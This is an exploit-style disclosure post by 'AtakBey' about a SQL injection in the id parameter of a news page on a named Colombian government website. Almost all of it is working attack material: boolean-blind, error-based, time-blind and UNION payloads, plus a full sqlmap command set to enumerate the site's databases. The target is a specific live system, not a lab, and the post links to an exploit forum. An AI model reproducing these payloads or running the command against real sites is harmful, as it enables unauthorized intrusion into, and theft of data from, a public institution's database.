-----------------------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: hmgy.gov.co SQL Injection Vulnerability
# Author : AtakBey
# Tested on : Windows 10
# Date : 09.10.2019
# Vendor Home: http://hmgy.gov.co/
# My Blog:http://atakbeysecurity.xyz
# Forum : https://secretteam.biz/
------------------------------------------------------------------------------------------------------------------------------------------------
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37' AND 2439=2439-- TnDC
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=37' AND (SELECT 5049 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT (ELT(5049=5049,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hpqE
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=37' AND SLEEP(5)-- oZaF
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-8996' UNION ALL SELECT CONCAT(0x71716a7171,0x7a56596c537641556f6e7668727a73756a6d6471616358675854596d7647594373776f46684d7656,0x716b786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- NiPt
------------------------------------------------------------------------------------------------------------------------------------------------
#SQL INJECTION
http://hmgy.gov.co/noticias.php?id=[SQL INJECTION]
------------------------------------------------------------------------------------------------------------------------------------------------
#SQLMAP COMMAND
sqlmap.py -u "http://hmgy.gov.co/noticias.php?id=37" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
